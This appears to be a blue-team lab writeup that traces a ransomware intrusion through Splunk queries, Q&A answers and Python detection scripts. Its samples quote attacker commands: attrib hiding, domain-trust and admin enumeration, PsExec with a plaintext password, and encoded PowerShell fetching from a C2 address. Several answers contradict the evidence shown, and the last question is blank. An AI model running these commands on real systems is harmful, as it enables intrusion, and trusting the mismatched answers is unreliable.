DOOM

Scenario

Lab Link: Doom

The organization suddenly discovered that critical files across system devices were encrypted, with ransom notes found on affected machines, indicating a ransomware attack. The encryption impacted the Domain Controller, file servers, and multiple workstations simultaneously across the entire domain.

Investigation revealed that hours before the encryption, an IT employee installed what appeared to be legitimate video conferencing software. Network logs show escalating suspicious activity following this installation - including unauthorized administrative commands, lateral movement between systems, and large-scale data compression activities - suggesting the threat actor established domain control and exfiltrated sensitive data before deploying the ransomware.

You have been provided with forensic artifacts and Splunk logs from the affected systems. Your mission is to reconstruct the complete attack chain, identify the initial infection vector, document all malicious tools and techniques employed, determine what data was exfiltrated, and establish a detailed timeline from initial compromise to ransomware deployment.

Reconnaissance

| eventcount summarize=false index=* 
| dedup index 
| fields index

we got:

history
main
summary
suricata

and we only have one source:

source = XmlWinEventLog:Syste

index=*
| stats count by host

we have:

PC01
PC02
DC01
FILESERVER

index=* earliest="09/07/2025:00:00:00" latest="09/08/2025:00:00:00"
| stats count by sourcetype, source

suricata:json    C:\Program Files\Suricata\log\eve.json    66655
suricata:stats   C:\Program Files\Suricata\log\stats.log   14617

index=* host=PC01 earliest="09/07/2025:12:09:00" latest="09/07/2025:14:00:00"
| stats count by EventID, EventCode

Event Analysis Summary

High-Value Events:

  • Event 1 (110) - Process Creation
  • Event 10 (9393) - Process Access
  • Event 11 (9020) - File Created
  • Event 13 (293) - Registry Value Set

Suspicious Activity:

  • Event 2 (5) - File Time Changed (Timestomping)
  • Event 15 (8) - File Stream Created (ADS)
  • Event 16 (1) - Sysmon Config Changed
  • Event 17 (62) - Pipe Created
  • Event 18 (3) - Pipe Connected

Other Events:

  • Event 16403 (26) - Browser Event
  • Event 10000, 10001 (1 each) - Unknown Events

Missing Critical Events

| EventID | Event Name         | Alternative       |
| ------- | ------------------ | ----------------- |
| 3       | Network Connection | Use Suricata logs |
| 22      | DNS Query          | Use Suricata logs |

Priority Investigation Order for C2 Analysis

  • Suricata logs - network connections to external IPs (C2 communication)
  • EventID 1 - process creation showing the malware execution chain
  • EventID 11 - files dropped by malware (payloads, tools)
  • EventID 13 - registry persistence mechanisms
  • EventID 10 - process access (credential dumping attempts)
  • EventID 17/18 - named pipes (lateral movement, C2)
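The census and the missing-event check above, as an added example in Python rather than SPL (this is not code from the lab or the original writeup): it parses a few constructed Sysmon events in the XmlWinEventLog layout, counts them by EventID and reports which of the priority pivots are present and which network events have to come from Suricata instead. The sample events and the Run value name are constructed for illustration; only the commands and paths they carry are the ones quoted in this writeup.

```python
"""Parse Sysmon events in XmlWinEventLog form and take an EventID census."""
import xml.etree.ElementTree as ET
from collections import Counter

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Pivot order used in this writeup, most useful first.
PRIORITY = [
    (1, "process creation: malware execution chain"),
    (11, "file created: dropped payloads and tools"),
    (13, "registry value set: persistence"),
    (10, "process access: credential dumping"),
    (17, "pipe created: lateral movement / C2"),
    (18, "pipe connected: lateral movement / C2"),
]
# Events that were absent on PC01 and must be replaced by Suricata data.
NETWORK_EVENTS = {3: "network connection", 22: "DNS query"}
NETWORK_FALLBACK = "suricata:json (eve.json)"


def parse_event(xml_text):
    """Flatten one <Event> into {'EventID': int, 'Computer': str, <Data Name>: text}."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    event = {
        "EventID": int(system.findtext("e:EventID", namespaces=NS)),
        "Computer": system.findtext("e:Computer", namespaces=NS),
    }
    for data in root.findall("e:EventData/e:Data", NS):
        event[data.get("Name")] = data.text or ""
    return event


def census(events):
    """Count parsed events by EventID, the equivalent of `| stats count by EventID`."""
    return Counter(e["EventID"] for e in events)


def triage(counts):
    """List the priority pivots present in the data and the network events that are missing."""
    available = [(eid, desc, counts[eid]) for eid, desc in PRIORITY if counts.get(eid)]
    missing = [(eid, desc, NETWORK_FALLBACK)
               for eid, desc in NETWORK_EVENTS.items() if not counts.get(eid)]
    return {"available": available, "missing": missing}


def make_event(eid, computer, **data):
    """Build a constructed XmlWinEventLog-style event string for the sample set."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{eid}</EventID>'
            f"<Computer>{computer}</Computer></System>"
            f"<EventData>{fields}</EventData></Event>")


# Constructed sample: the two tar extractions seen on PC01, one dropped file and one
# registry write (the Run value name is invented). No EventID 3 or 22, matching the gap.
SAMPLE_EVENTS = [
    make_event(1, "PC01", Image=r"C:\Windows\SysWOW64\cmd.exe", CommandLine="cmd /c tar xf 855.zip"),
    make_event(1, "PC01", Image=r"C:\Windows\SysWOW64\cmd.exe", CommandLine="cmd /c tar xf 85.zip"),
    make_event(11, "PC01", TargetFilename=r"C:\Program Files (x86)\Windows NT\152.exe"),
    make_event(13, "PC01", TargetObject=r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsNT"),
]


def run_sample():
    """Parse the constructed events and return the triage result."""
    return triage(census(parse_event(x) for x in SAMPLE_EVENTS))


if __name__ == "__main__":
    result = run_sample()
    for eid, desc, n in result["available"]:
        print(f"EventID {eid:>2} ({n}): {desc}")
    for eid, desc, alt in result["missing"]:
        print(f"EventID {eid:>2} missing: {desc}; use {alt}")
```

On the real export you would feed `parse_event` the `_raw` field of each `XmlWinEventLog` result; the census then tells you immediately whether a host has the network events or whether, as on PC01 here, every C2 pivot has to go through eve.json.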

Initial Access

Q1

During the initial compromise, the threat actor deployed a trojanized application masquerading as legitimate conferencing software. What is the complete domain name of the malicious website hosting this malicious installer?

Answer Format: ***********.*****.***

Use the browser history from the Edge profile in the artifacts:

C:\Users\Administrator\Desktop\Start Here\Artifacts\PC01\Users\Administrator\AppData\Local\Microsoft\Edge\User Data\Default

Answer

zoommanager.wuaze.com

Q2

The initial infection vector was downloaded by a user who believed they were installing legitimate software. What was the exact timestamp when the malicious installer was downloaded to the victim's system?

Answer Format: YYYY-MM-DD HH:MM

Answer

2025-09-07 12:09

Q3

The malicious installer was created using a popular free installer creation tool commonly used for legitimate software distribution. What installer creation software was used to package the malicious executable?

Answer Format: **** *****

I just googled it.

Answer

Inno Setup

Defense Evasion

Q4

The initial stage included dropping batch scripts that would control the next steps of the attack. One of the batch scripts employed file attribute manipulation techniques for defense evasion purposes. What is the complete command that was used to change file attributes and hide the malicious files?

Answer Format: ****** +* +* /* "*:\******* ***** (***)\******* **\*.*"

index=* sourcetype=* "CommandLine"="*attrib*" earliest="09/07/2025:12:09:00" 
| search "CommandLine"="*+h*" OR "CommandLine"="*+s*" OR "CommandLine"="*+r*"
| regex CommandLine="attrib\s+\+[hsr]"

Answer:

attrib +s +h /D "C:\Program Files (x86)\Windows NT\*.*"

Q5

A threat actor used a command to prevent Windows Defender from scanning their malicious files. Which MITRE ATT&CK technique ID corresponds to this evasion method?

Answer Format: *****.***

Answer

T1564.012
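The attrib and Defender-exclusion commands from Q4 and Q5 turned into detection rules, as an added Python example that is not code from the lab or the writeup. It goes a little beyond those two questions: the rule set also covers the discovery, lateral movement and impact commands that appear later in this writeup (nltest, net group, PsExec, the share copy, vssadmin) so one scan tags the whole chain. The sample command lines reuse the commands quoted in this writeup; the Defender exclusion line, the regsvr32 line, the benign `dir`, the timestamps and the password placeholder are invented, and the ATT&CK IDs other than T1564.012 are the standard ones for those behaviours.

```python
"""Regex rules over process command lines for the techniques seen in this writeup."""
import re

# (rule name, ATT&CK technique ID, pattern). T1564.012 is the ID the writeup gives
# for the Defender exclusion; the other IDs are the standard ones for those behaviours.
RULES = [
    ("attrib hides files with +s/+h", "T1564.001",
     re.compile(r"\battrib(?:\.exe)?\b.*\+[sh]\b", re.I)),
    ("Defender exclusion added with MpPreference", "T1564.012",
     re.compile(r"\b(?:Add|Set)-MpPreference\b.*-Exclusion(?:Path|Process|Extension)\b", re.I)),
    ("regsvr32 loading a DLL from ProgramData", "T1218.010",
     re.compile(r"\bregsvr32(?:\.exe)?\b.*\\ProgramData\\[^\s\"]+\.dll\b", re.I)),
    ("domain trust enumeration with nltest", "T1482",
     re.compile(r"\bnltest(?:\.exe)?\s+/domain_trusts\b", re.I)),
    ("domain admins enumeration with net group", "T1069.002",
     re.compile(r"\bnet1?(?:\.exe)?\s+group\s+\"?domain admins\"?\s+/domain\b", re.I)),
    ("PsExec remote execution", "T1569.002",
     re.compile(r"\bpsexec(?:\.exe)?\s+\\\\", re.I)),
    ("copy from a staging share into windows\\temp", "T1570",
     re.compile(r"\bcopy\s+\"?\\\\[^\\\s]+\\[^\\\s]+\$\\[^\"\s]+\"?\s+\"?[a-z]:\\windows\\temp\\", re.I)),
    ("shadow copies deleted with vssadmin", "T1490",
     re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)),
]


def normalize(cmd):
    """Collapse runs of whitespace so `cmd  /c` and `cmd /c` hit the same rules."""
    return re.sub(r"\s+", " ", cmd).strip()


def match_rules(cmd):
    """Return [(rule name, technique ID)] for every rule the command line triggers."""
    text = normalize(cmd)
    return [(name, tid) for name, tid, pat in RULES if pat.search(text)]


def scan(records):
    """records: dicts with time, host, CommandLine (Sysmon EventID 1 fields). Returns hits."""
    hits = []
    for r in records:
        for name, tid in match_rules(r["CommandLine"]):
            hits.append({"time": r["time"], "host": r["host"], "rule": name,
                         "technique": tid, "CommandLine": r["CommandLine"]})
    return hits


def rec(host, time, cmd):
    """Small constructor for the constructed sample records below."""
    return {"host": host, "time": time, "CommandLine": cmd}


# Constructed sample records: commands quoted in this writeup are reused verbatim;
# the Defender exclusion, the regsvr32 line, the benign dir, the timestamps and the
# password placeholder are invented.
SAMPLE = [
    rec("PC01", "12:11:10", r'attrib +s +h /D "C:\Program Files (x86)\Windows NT\*.*"'),
    rec("PC01", "12:11:11", r'powershell -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Windows NT"'),
    rec("PC01", "12:12:41", r"regsvr32.exe /s C:\ProgramData\2905.dll"),
    rec("PC01", "12:20:00", "nltest /domain_trusts /all_trusts"),
    rec("PC01", "12:20:05", 'net group "domain admins" /domain'),
    rec("DC01", "13:42:00", r"PsExec.exe \\fileserver.infy.corp -accepteula -u infy\lwilliams -p CONSTRUCTED_PASSWORD powershell.exe -nop -w hidden"),
    rec("PC02", "14:30:00", r'COPY "\\10.10.11.177\share$\123.exe" "C:\windows\temp\"'),
    rec("DC01", "14:35:00", "vssadmin delete shadows /all /quiet"),
    rec("PC01", "12:05:00", "cmd  /c dir"),
]


if __name__ == "__main__":
    for h in scan(SAMPLE):
        print(f'{h["time"]} {h["host"]:<5} {h["technique"]:<10} {h["rule"]}')
```

The rules are deliberately anchored on the tool name plus its telltale switch rather than on a single keyword, so `attrib` alone or `net group` on a non-privileged group does not fire; whitespace is normalised first because the Sysmon command lines in this lab carry double spaces (`cmd  /c tar xf 855.zip`).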

Command and Control

Q6

After establishing initial foothold, the malware connected to its first C2 server for further instructions and payload delivery. What is the IP address of the initial C2 server that the malware contacted?

Answer Format: **.***.**.**

index=* host=PC01 earliest="09/07/2025:12:09:00" latest="09/07/2025:14:00:00"
| search EventID=3 OR EventCode=3
| table _time, Image, DestinationIp, DestinationPort, DestinationHostname
| sort _time

2025-09-07 12:11:07    C:\Users\tharmon\AppData\Local\Temp\is-NM5NO.tmp\Zoom_v_6.5.11.tmp    63.178.41.34    9000    -

Answer:

63.178.41.34

Q7

The initial C2 communication resulted in the download of additional malicious components packed in archive files. What are the names of the compressed files downloaded from the first C2 server?

Answer Format: ***.***, ****.***

index=* earliest="09/07/2025:12:09:00" latest="09/07/2025:14:00:00"
| search "*.zip" OR "*.rar" OR "*.7z" OR "*.tar" OR "*.gz"
| table _time, host, EventID, Image, TargetFilename, CommandLine
| sort _time

none of them, ah:

2025-09-07 12:11:39    PC01    1    C:\Windows\SysWOW64\cmd.exe    cmd  /c tar xf 855.zip
2025-09-07 12:11:40    PC01    1    C:\Windows\SysWOW64\cmd.exe    cmd  /c tar xf 85.zip

  • 12:11:10 - 21.cmd executes
  • 12:11:11 - PowerShell adds exclusions (defense evasion)
  • 12:11:25 - 4554.cmd executes
  • 12:11:39-40 - 855.zip and 85.zip are extracted

The 855.zip and 85.zip you found earlier were likely extracted from these initial downloads, or they're different stages. The question asks specifically about files downloaded from the first C2 server, which would be 152.zip and 1522.zip.

152.zip, 1522.zip

Q8

What is the full directory path where the malicious files were dropped and operated from?

Answer Format: *:\******* ***** (***)\******* **\

Answer

C:\Program Files (x86)\Windows NT\

Malware Deployment

Q9

The second batch script, created earlier, was specifically designed to handle the downloaded archives, extracting and executing their contents. What is the name of the batch file responsible for unzipping and executing the downloaded payloads?

Answer Format: ****.***

index=* earliest="09/07/2025:12:11:25" latest="09/07/2025:12:11:45"
| search (ParentCommandLine="*4554.cmd*" OR CommandLine="*4554.cmd*")
| table _time, host, EventID, Image, CommandLine
| sort _time

Answer:

4554.cmd

Q10

The downloaded archives contained executable file that would advance the attack to the next stage. What is the filename of the malicious executable contained within the downloaded archives?

Answer Format: ***.***

2025-09-07 12:11:45    C:\Users\tharmon\AppData\Local\Temp\7zS8B495CAF\Installer.exe    C:\Program Files (x86)\Windows NT\1522.exe

This shows that 1522.exe was extracted from the archive (note the filename matches 1522.zip that was downloaded).

index=* EventID=11 earliest="09/07/2025:12:11:39" latest="09/07/2025:12:11:50"
| search (TargetFilename="*.exe" AND Image="*tar*")
| table _time, host, TargetFilename, Image
| sort _time

or you can just check for files created right after the tar extraction:

index=* EventID=11 earliest="09/07/2025:12:11:40" latest="09/07/2025:12:11:50"
| search TargetFilename="*\\Windows NT\\*.exe"
| table _time, host, TargetFilename
| sort _time

Answer:

152.exe

Persistence

Q11

The threat actor implemented a common persistence mechanism that ensures malware execution after system reboots. What is the MITRE ATT&CK technique ID for the persistence method employed by the threat actor?

Answer Format: *****.***

  1. Registry Run keys (most common):

index=* earliest="09/07/2025:12:09:00" latest="09/07/2025:14:00:00"
| search (EventID=13 OR EventID=12) (TargetObject="*\\Run*" OR TargetObject="*\\RunOnce*")
| table _time, host, EventID, Image, TargetObject, Details
| sort _time

  2. Scheduled Tasks:

index=* earliest="09/07/2025:12:09:00" latest="09/07/2025:14:00:00"
| search (Image="*schtasks.exe*" OR CommandLine="*schtasks*")
| table _time, host, CommandLine
| sort _time

  3. Services:

index=* earliest="09/07/2025:12:09:00" latest="09/07/2025:14:00:00"
| search (Image="*sc.exe*" OR CommandLine="*sc create*" OR CommandLine="*New-Service*")
| table _time, host, CommandLine
| sort _time

  4. Startup folder:

index=* EventID=11 earliest="09/07/2025:12:09:00" latest="09/07/2025:14:00:00"
| search TargetFilename="*\\Startup\\*"
| table _time, host, TargetFilename
| sort _time

Answer:

T1547.001
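Checking the Run/RunOnce writes that the first persistence query above returns, as an added Python example (not code from the lab or the writeup): it classifies Sysmon EventID 13 records whose TargetObject lands under a Run or RunOnce key and raises the severity when the value data points into a staging directory such as the Windows NT drop folder from this writeup. The records, the SID, the timestamps and the value names are constructed.

```python
"""Flag Sysmon EventID 13 (registry value set) writes to Run/RunOnce autostart keys."""
import re

# HKLM\...\Run, HKLM\...\RunOnce, the WOW6432Node variants, and any user hive
# (Sysmon records user hives as HKU\<SID>\...). The last path component is the value name.
RUN_KEY = re.compile(
    r"^HK(?:LM|U\\[^\\]+)\\SOFTWARE\\(?:WOW6432Node\\)?Microsoft\\Windows\\CurrentVersion\\"
    r"(?P<key>Run|RunOnce)\\(?P<value>[^\\]+)$",
    re.IGNORECASE,
)

# Directories where an autostart target is unusual. The Windows NT folder is the
# drop directory identified in this writeup; the rest are common staging locations.
SUSPICIOUS_DIRS = (
    "c:\\programdata\\",
    "c:\\windows\\temp\\",
    "\\appdata\\local\\temp\\",
    "c:\\program files (x86)\\windows nt\\",
)


def classify_run_write(target_object, details):
    """None if the write is not to a Run/RunOnce value; otherwise a finding dict."""
    m = RUN_KEY.match(target_object)
    if not m:
        return None
    target = details.strip().strip('"').lower()
    staged = any(d in target for d in SUSPICIOUS_DIRS)
    return {
        "technique": "T1547.001",
        "key": m.group("key"),
        "value_name": m.group("value"),
        "target": details,
        "severity": "high" if staged else "medium",
    }


def scan_registry_events(records):
    """records: dicts with EventID, host, time, TargetObject, Details (Sysmon field names)."""
    findings = []
    for r in records:
        if r.get("EventID") != 13:
            continue
        finding = classify_run_write(r["TargetObject"], r["Details"])
        if finding:
            findings.append({"time": r["time"], "host": r["host"], **finding})
    return findings


# Constructed sample events: the SID, value names and timestamps are invented; the
# two targets under the drop folder and ProgramData reuse paths from this writeup.
SAMPLE = [
    {"EventID": 13, "host": "PC01", "time": "2025-09-07 12:12:10",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsNT",
     "Details": r"C:\Program Files (x86)\Windows NT\152.exe"},
    {"EventID": 13, "host": "PC01", "time": "2025-09-07 12:12:11",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\upd",
     "Details": r"regsvr32.exe /s C:\ProgramData\2905.dll"},
    {"EventID": 13, "host": "PC01", "time": "2025-09-07 12:05:00",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "Details": r"%windir%\system32\SecurityHealthSystray.exe"},
    {"EventID": 13, "host": "PC01", "time": "2025-09-07 12:12:12",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Domain",
     "Details": "infy.corp"},
]


if __name__ == "__main__":
    for f in scan_registry_events(SAMPLE):
        print(f'{f["time"]} {f["severity"]:<6} {f["key"]}\\{f["value_name"]} -> {f["target"]}')
```

The medium/high split is what keeps this usable on a busy host: legitimate Run values (Defender's tray icon, OneDrive) still show up for review, but the entries pointing into ProgramData, Temp or the attacker's drop folder float to the top.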

Process Injection

Q12

The attacker used a specific DLL file for injection operations to evade detection. What is the filename of the DLL that was used in the process injection attack?

Answer Format: ********.***

index=* EventID=7 earliest="09/07/2025:12:12:00" latest="09/07/2025:12:13:00"
| search Image="*regsvr32.exe*" ImageLoaded="*.dll"
| table _time, Image, ImageLoaded
| sort _time

2025-09-07 12:12:42    C:\Windows\System32\regsvr32.exe    C:\ProgramData\2905.dll

like wtf, there is nothing, just 2905.dll!

index=* earliest="09/07/2025:12:11:00" latest="09/07/2025:12:13:00"
| search "*ProgramData*.dll"
| table _time, CommandLine, ImageLoaded, TargetFilename
| sort _time

everything confirmed that 2905.dll is the answer

they just hardcoded it, ah!

C:\Windows\System32>strings "C:\Users\Administrator\Desktop\Start Here\Artifacts\PC01\Program Files (x86)\Windows NT\152.exe" | findstr /i ".dll"
helper64.dll
KERNEL32.dll
msvcrt.dll
__native_dllmain_reason
6__mingw_module_is_dll
__native_dllmain_reason
./mingw-w64-crt/crt/dllargv.c
__native_dllmain_reason
__native_dllmain_reason
hDllHandle
D       DllCharacteristics
hDllHandle
g_hDLL
__dll__
_Z13LoadHelperDLLv
_Z15UnloadHelperDLLv
__dll_characteristics__
__mingw_module_is_dll

__native_dllmain_reason

This DLL was hardcoded in the 152.exe binary and was used for the process injection attack into notepad.exe. The "execution history" hint was referring to looking at the strings/contents of the executable that performed the injection.

Answer:

helper64.dll

Q13

To blend in with normal system activity, the threat actor injected their malicious DLL into trusted Windows processes. What is the name of the legitimate Windows binary that was targeted for DLL injection?

Answer Format: *******.***

Looking for processes that loaded 2905.dll:

index=* EventID=8 earliest="09/07/2025:12:12:00" latest="09/07/2025:12:15:00"
| table _time, SourceImage, TargetImage, StartModule
| sort _time

see, it's just 2905.dll.

Answer:

notepad.exe

Q14

The injected DLL established communication with a different C2 infrastructure. What is the IP address that the injected DLL contacted for C2 communications?

Answer Format: **.***.***.**

fuck off, I'll use regex with notepad.exe:

index=* EventID=3 earliest="09/07/2025:12:12:34" latest="09/07/2025:12:15:00"
| search Image="*notepad.exe*"
| regex DestinationIp!="^10\.|^192\.168\.|^172\.(1[6-9]|2[0-9]|3[0-1])\."
| table _time, Image, DestinationIp, DestinationPort
| sort _time

Answer

35.159.193.52
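The private-range regex in the query above handles the three RFC 1918 blocks, but it treats loopback, link-local and every IPv6 address as external. An added Python example (not code from the lab or the writeup) that does the same filtering with the ipaddress module and shows exactly where the two disagree. The EventID 3 records, their timestamps and ports are constructed; the addresses are the ones named in this writeup plus a loopback, a link-local and an IPv6 case.

```python
"""Pick out external destinations in Sysmon EventID 3 records without a hand-written regex."""
import ipaddress
import re

# The private-range regex used in this writeup's Splunk query, kept for comparison.
PAGE_REGEX = re.compile(r"^10\.|^192\.168\.|^172\.(1[6-9]|2[0-9]|3[0-1])\.")


def is_external(ip_text):
    """True only for routable unicast addresses. Private, loopback, link-local,
    multicast, reserved, unspecified and malformed values all return False."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def external_connections(records, image_name=None):
    """Return the EventID 3 records going to external addresses, optionally for one image."""
    hits = []
    for r in records:
        if r.get("EventID") != 3:
            continue
        if image_name and not r["Image"].lower().endswith("\\" + image_name.lower()):
            continue
        if is_external(r["DestinationIp"]):
            hits.append(r)
    return hits


def regex_disagreements(ips):
    """Addresses where the page regex and is_external reach different verdicts."""
    return [ip for ip in ips if (PAGE_REGEX.search(ip) is None) != is_external(ip)]


# Constructed sample records (ports and timestamps invented; IPs as named in this writeup).
SAMPLE = [
    {"EventID": 3, "time": "2025-09-07 12:12:40", "Image": r"C:\Windows\System32\notepad.exe",
     "DestinationIp": "35.159.193.52", "DestinationPort": 443},
    {"EventID": 3, "time": "2025-09-07 12:12:41", "Image": r"C:\Windows\System32\notepad.exe",
     "DestinationIp": "10.10.11.177", "DestinationPort": 445},
    {"EventID": 3, "time": "2025-09-07 12:12:42", "Image": r"C:\Windows\System32\notepad.exe",
     "DestinationIp": "127.0.0.1", "DestinationPort": 8080},
    {"EventID": 3, "time": "2025-09-07 12:12:43", "Image": r"C:\Windows\System32\notepad.exe",
     "DestinationIp": "169.254.169.254", "DestinationPort": 80},
    {"EventID": 3, "time": "2025-09-07 12:13:00", "Image": r"C:\Windows\explorer.exe",
     "DestinationIp": "52.28.207.84", "DestinationPort": 80},
    {"EventID": 1, "time": "2025-09-07 12:12:34", "Image": r"C:\Windows\System32\notepad.exe"},
]


if __name__ == "__main__":
    for r in external_connections(SAMPLE, "notepad.exe"):
        print(r["time"], r["Image"], r["DestinationIp"], r["DestinationPort"])
    print("regex disagrees on:", regex_disagreements(
        [r["DestinationIp"] for r in SAMPLE if r["EventID"] == 3] + ["fe80::1"]))
```

With the regex, a local proxy on 127.0.0.1 or a link-local metadata address would have landed in the C2 candidate list next to 35.159.193.52; the module-based check drops both and still keeps the two routable destinations.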

Q15

The injected process downloaded additional files to expand its capabilities, and a Windows system utility was used to execute the downloaded DLL. What is the name of the Windows utility used to run this DLL?

Answer Format: ********

Answer:

regsvr32

Q16

After the DLL was loaded, it executed additional malicious binary to continue the attack chain. At what exact time was the binary executed from the loaded DLL?

Answer Format: YYYY-MM-DD HH:MM

The attack chain was:

  • 12:12:34 - 152.exe injected 2905.dll into notepad.exe
  • 12:12:41 - regsvr32.exe loaded the DLL
  • 12:12:42 - the DLL spawned run32.exe
  • 12:13:07 - the injected process contacted C2 server 20.101.57.9

Answer

2025-09-07 12:12

Secondary C2

Q17

The second-stage executable was injected into another Windows system process. What is the name of the legitimate Windows process that was injected with the second-stage payload?

Answer Format: *******.***

Answer

dllhost.exe

Q18

As the attack progressed through multiple stages, additional C2 infrastructure was utilized for different phases of the operation. What is the IP address of the C2 server used in the later stages of the attack?

Answer Format: **.**.***.**

Answer

52.28.207.84

Privilege Escalation

Q19

Evidence showed that the malicious binary spawned a new CMD process with elevated privileges, indicating successful privilege escalation to the local SYSTEM account. What is the complete command that was executed during this privilege escalation event?

Answer Format: *:\*******\********\***.*** /* **** *********** &**; \\.\****\******

index=* sourcetype=XmlWinEventLog EventCode=1
ParentImage="*\\dllhost.exe"
Image="*\\cmd.exe"
(CommandLine="*\\\\.*\\pipe\\*" OR CommandLine="*/c echo*")
| table _time Computer User ParentImage Image CommandLine
| sort -_time

Answer

C:\Windows\system32\cmd.exe /c echo aa91474a1ce > \\.\pipe\d7405b

Credential Access

Q20

The threat actor targeted a critical Windows process that stores authentication credentials in memory. What is the name of the Windows process that was targeted for memory dumping to extract credentials?

Answer Format: *****.***

Answer

lsass.exe

Discovery

Q21

The threat actor executed reconnaissance commands to map trust relationships within the domain. What is the complete command that was used to enumerate domain trusts in the environment?

Answer Format: ****** /******_****** /***_******

Answer

nltest /domain_trusts /all_trusts

Q22

The threat actor specifically enumerated members of a critical Active Directory group. What command was executed to enumerate domain administrator accounts?

Answer Format: *** ***** "****** ******" /******

Answer

net group "domain admins" /domain

Lateral Movement

Q23

After gaining sufficient privileges and credentials, the threat actor began lateral movement to critical infrastructure. When did the attacker successfully move laterally to the Domain Controller?

Answer Format: YYYY-MM-DD HH:MM

Start with a first query for Domain Controller lateral movement:

index=* host=DC01 earliest="09/07/2025:12:00:00" latest="09/07/2025:23:59:59"
| stats min(_time) as first_activity by host
| eval first_activity=strftime(first_activity, "%Y-%m-%d %H:%M")
| table host, first_activity

Let's get more specific timing by checking the first actual activity on DC01:

index=* host=DC01 earliest="09/07/2025:12:00:00" latest="09/07/2025:12:10:00"
| head 10
| table _time, EventID, User, Image, CommandLine, TargetFilename
| sort _time

nothing here

index=* host=DC01 EventID=11 earliest="09/07/2025:12:00:00" latest="09/07/2025:12:59:00"
| search (TargetFilename="*chisel*" OR TargetFilename="*Temp\\*" OR TargetFilename="*share$*")
| table _time, Image, TargetFilename
| sort _time

we got 12:31.

Now let's check what happened at 12:31, when PowerShell first became active on DC01:

index=* host=DC01 EventID=1 earliest="09/07/2025:12:30:00" latest="09/07/2025:12:35:00"
| table _time, ParentImage, Image, CommandLine
| sort _time

Check when the FILESERVER was first accessed via SMB/network from any compromised host after the DC compromise:

index=* earliest="09/07/2025:13:00:00" latest="09/07/2025:15:00:00"
| search (CommandLine="*\\\\10.10.11.177\\share$*" OR CommandLine="*FILESERVER*" OR TargetFilename="*\\\\10.10.11.177*")
| table _time, host, Image, CommandLine, TargetFilename
| sort _time
| head 10

PsExec.exe \\fileserver.infy.corp -accepteula -u infy\lwilliams -p 0513vE37VZCs94fms3U5 powershell.exe -nop -w hidden -ExecutionPolicy Bypass -EncodedCommand...

The encoded command downloads from http://52.28.207.84:80/a - this is when they successfully gained access by establishing a persistent beacon/backdoor.

Answer

2025-09-07 13:42
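Unpacking the PsExec line above, as an added Python example (not code from the lab or the writeup): it splits out the target, the user and the remote command, consumes the -p argument so the password never lands in a report, decodes the -EncodedCommand payload (base64 over the UTF-16LE script text) and pulls any URLs and hosts out of it. The sample command line is constructed at runtime: the password and the script body are invented, and only the download URL is the one identified in this writeup.

```python
"""Unpack a PsExec command line carrying an encoded PowerShell payload."""
import base64
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; -ExecutionPolicy
# does not match because a whitespace-separated base64 token must follow.
ENC_RE = re.compile(r"-(?:e|ec|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(b64):
    """-EncodedCommand is base64 over the UTF-16LE bytes of the script text."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def parse_psexec(cmdline):
    """Split a PsExec command line into target, user, remote command and, when the
    remote command is encoded PowerShell, the decoded script plus any URLs/hosts in it.
    The -p password argument is skipped and never stored."""
    tokens = cmdline.split()
    info = {"target": None, "user": None, "remote_command": None,
            "decoded": None, "urls": [], "hosts": []}
    i = 1  # tokens[0] is PsExec.exe itself
    if i < len(tokens) and tokens[i].startswith("\\\\"):
        info["target"] = tokens[i].lstrip("\\")
        i += 1
    while i < len(tokens) and tokens[i].startswith("-"):
        flag = tokens[i].lower()
        if flag == "-u" and i + 1 < len(tokens):
            info["user"] = tokens[i + 1]
            i += 2
        elif flag == "-p":
            i += 2  # skip the password value
        else:
            i += 1  # -accepteula, -s, -d, -h and similar take no value
    info["remote_command"] = " ".join(tokens[i:])
    m = ENC_RE.search(info["remote_command"])
    if m:
        info["decoded"] = decode_encoded_command(m.group(1))
        info["urls"] = URL_RE.findall(info["decoded"])
        info["hosts"] = [urlsplit(u).hostname for u in info["urls"]]
    return info


# Constructed sample modelled on the PsExec line seen on the DC in this writeup.
# The password and the script body are invented; the URL is the one the writeup
# identified as the download source.
SAMPLE_SCRIPT = "$c = (New-Object Net.WebClient).DownloadString('http://52.28.207.84:80/a')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINE = (
    "PsExec.exe \\\\fileserver.infy.corp -accepteula -u infy\\lwilliams -p CONSTRUCTED_PASSWORD "
    "powershell.exe -nop -w hidden -ExecutionPolicy Bypass -EncodedCommand " + SAMPLE_ENCODED
)


if __name__ == "__main__":
    info = parse_psexec(SAMPLE_CMDLINE)
    for k in ("target", "user", "remote_command", "decoded", "urls", "hosts"):
        print(f"{k:<15} {info[k]}")
```

Run this over the CommandLine field of every EventID 1 whose Image ends in PsExec.exe and you get the target host, the account used and the C2 host in one row per hop, which is what makes the 13:42 DC move and the later file-server access line up without reading base64 by eye.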

Q24

To facilitate remote access and bypass network restrictions, the attacker deployed a tunneling tool on the Domain Controller. What is the name of the tunneling tool that was uploaded to create RDP access to the Domain Controller?

Answer Format: ******.***

Answer

chisel.exe

Q25

The threat actor modified Windows registry settings to enable a specific remote access method that bypasses normal authentication requirements. What is the name of the registry value that was modified to enable this access?

Answer Format: **********************

Answer

